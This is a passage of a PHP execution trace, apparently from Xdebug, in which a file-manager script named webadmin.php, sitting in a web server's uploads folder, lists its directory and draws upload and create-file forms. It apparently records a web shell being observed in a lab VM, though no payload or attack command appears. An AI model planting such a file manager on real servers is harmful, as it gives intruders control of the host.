3	157	1	0.008062	800032
3	157	R			FALSE
2		A						/var/www/html/uploads/webadmin.php	1188	$sort = 'filename'
3	158	0	0.008086	799968	array_key_exists	0		/var/www/html/uploads/webadmin.php	1189	2	'reverse'	[]
3	158	1	0.008100	800032
3	158	R			FALSE
2		A						/var/www/html/uploads/webadmin.php	1189	$reverse = FALSE
3	159	0	0.008126	799968	directory_choice	1		/var/www/html/uploads/webadmin.php	1198	0
4	160	0	0.008142	800112	urlencode	0		/var/www/html/uploads/webadmin.php	1438	1	'/var/www/html/uploads/'
4	160	1	0.008156	800208
4	160	R			'%2Fvar%2Fwww%2Fhtml%2Fuploads%2F'
4	161	0	0.008172	800144	word	1		/var/www/html/uploads/webadmin.php	1438	1	'directory'
5	162	0	0.008186	800168	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'Directory'	2	'UTF-8'
5	162	1	0.008203	800440
5	162	R			'Directory'
4	161	1	0.008217	800328
4	161	R			'Directory'
4	163	0	0.008231	800232	textfieldsize	1		/var/www/html/uploads/webadmin.php	1439	1	'/var/www/html/uploads/'
4		A						/var/www/html/uploads/webadmin.php	1575	$size = 27
4		A						/var/www/html/uploads/webadmin.php	1576	$size = 30
4	163	1	0.008266	800232
4	163	R			30
4	164	0	0.008280	800232	html	1		/var/www/html/uploads/webadmin.php	1439	1	'/var/www/html/uploads/'
5	165	0	0.008293	800232	htmlentities	0		/var/www/html/uploads/webadmin.php	1594	3	'/var/www/html/uploads/'	2	NULL
5	165	1	0.008308	800504
5	165	R			'/var/www/html/uploads/'
4	164	1	0.008323	800392
4	164	R			'/var/www/html/uploads/'
4	166	0	0.008337	800360	word	1		/var/www/html/uploads/webadmin.php	1440	1	'change'
5	167	0	0.008350	800360	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'change'	2	'UTF-8'
5	167	1	0.008364	800632
5	167	R			'change'
4	166	1	0.008378	800520
4	166	R			'change'
3	159	1	0.008392	800040
3	168	0	0.008399	800040	is_writable	0		/var/www/html/uploads/webadmin.php	1205	1	'/var/www/html/uploads/'
3	168	1	0.008416	800080
3	168	R			TRUE
3	169	0	0.008430	800040	upload_box	1		/var/www/html/uploads/webadmin.php	1206	0
4	170	0	0.008443	800104	word	1		/var/www/html/uploads/webadmin.php	1452	1	'file'
5	171	0	0.008456	800104	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'File'	2	'UTF-8'
5	171	1	0.008470	800376
5	171	R			'File'
4	170	1	0.008484	800264
4	170	R			'File'
4	172	0	0.008502	800232	word	1		/var/www/html/uploads/webadmin.php	1454	1	'upload'
5	173	0	0.008515	800232	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'upload'	2	'UTF-8'
5	173	1	0.008529	800504
5	173	R			'upload'
4	172	1	0.008543	800392
4	172	R			'upload'
3	169	1	0.008557	800040
3	174	0	0.008564	800040	create_box	1		/var/www/html/uploads/webadmin.php	1207	0
4	175	0	0.008576	800200	word	1		/var/www/html/uploads/webadmin.php	1467	1	'file'
5	176	0	0.008588	800200	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'File'	2	'UTF-8'
5	176	1	0.008602	800472
5	176	R			'File'
4	175	1	0.008615	800360
4	175	R			'File'
4	177	0	0.008628	800264	word	1		/var/www/html/uploads/webadmin.php	1468	1	'directory'
5	178	0	0.008641	800264	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'Directory'	2	'UTF-8'
5	178	1	0.008656	800536
5	178	R			'Directory'
4	177	1	0.008669	800424
4	177	R			'Directory'
4	179	0	0.008683	800424	word	1		/var/www/html/uploads/webadmin.php	1471	1	'create'
5	180	0	0.008696	800424	htmlentities	0		/var/www/html/uploads/webadmin.php	1599	3	'create'	2	'UTF-8'
5	180	1	0.008710	800696
5	180	R			'create'
4	179	1	0.008723	800584
4	179	R			'create'
3	174	1	0.008736	800040
3	181	0	0.008744	800040	sortlist	1		/var/www/html/uploads/webadmin.php	1213	3	[0 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]	'filename'	FALSE
3		A						/var/www/html/uploads/webadmin.php	907	$dirs = []
3		A						/var/www/html/uploads/webadmin.php	908	$files = []
3		A						/var/www/html/uploads/webadmin.php	910	$i = 0
4	182	0	0.008849	800040	sizeof	0		/var/www/html/uploads/webadmin.php	910	1	[0 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	182	1	0.008918	800072
4	182	R			6
3		A						/var/www/html/uploads/webadmin.php	912	$files[] = ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes']
3		A						/var/www/html/uploads/webadmin.php	910	$i++
4	183	0	0.008970	800416	sizeof	0		/var/www/html/uploads/webadmin.php	910	1	[0 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	183	1	0.009038	800448
4	183	R			6
3		A						/var/www/html/uploads/webadmin.php	911	$dirs[] = ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/webadmin.php	910	$i++
4	184	0	0.009088	800792	sizeof	0		/var/www/html/uploads/webadmin.php	910	1	[0 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	184	1	0.009154	800824
4	184	R			6
3		A						/var/www/html/uploads/webadmin.php	911	$dirs[] = ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/webadmin.php	910	$i++
4	185	0	0.009203	800792	sizeof	0		/var/www/html/uploads/webadmin.php	910	1	[0 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	185	1	0.009273	800824
4	185	R			6
3		A						/var/www/html/uploads/webadmin.php	912	$files[] = ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/webadmin.php	910	$i++
4	186	0	0.009322	800792	sizeof	0		/var/www/html/uploads/webadmin.php	910	1	[0 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	186	1	0.009387	800824
4	186	R			6
3		A						/var/www/html/uploads/webadmin.php	911	$dirs[] = ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/webadmin.php	910	$i++
4	187	0	0.009449	800792	sizeof	0		/var/www/html/uploads/webadmin.php	910	1	[0 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	187	1	0.009515	800824
4	187	R			6
3		A						/var/www/html/uploads/webadmin.php	912	$files[] = ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']
3		A						/var/www/html/uploads/webadmin.php	910	$i++
4	188	0	0.009565	800792	sizeof	0		/var/www/html/uploads/webadmin.php	910	1	[0 => ['filename' => 'webadmin.php', 'path' => '/var/www/html/uploads/webadmin.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 77659, 'permission' => 33204, 'owner' => 1000, 'group' => 1000, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'osboxes', 'group_name' => 'osboxes'], 1 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 3 => ['filename' => 'prepend.php', 'path' => '/var/www/html/uploads/prepend.php', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 57, 'permission' => 33261, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 4 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 5 => ['filename' => '.htaccess', 'path' => '/var/www/html/uploads/.htaccess', 'is_file' => TRUE, 'is_dir' => FALSE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => FALSE, 'size' => 64, 'permission' => 33188, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => FALSE, 'owner_name' => 'root', 'group_name' => 'root']]
4	188	1	0.009630	800824
4	188	R			6
4	189	0	0.009644	800816	sizeof	0		/var/www/html/uploads/webadmin.php	915	1	[0 => ['filename' => '..', 'path' => '/var/www/html/uploads/..', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 1 => ['filename' => '.', 'path' => '/var/www/html/uploads/.', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root'], 2 => ['filename' => 'data', 'path' => '/var/www/html/uploads/data', 'is_file' => FALSE, 'is_dir' => TRUE, 'is_link' => FALSE, 'is_readable' => TRUE, 'is_writable' => TRUE, 'size' => 4096, 'permission' => 16895, 'owner' => 0, 'group' => 0, 'mtime' => 1676243916, 'atime' => 1676243916, 'ctime' => 1676243916, 'is_executable' => TRUE, 'owner_name' => 'root', 'group_name' => 'root']]
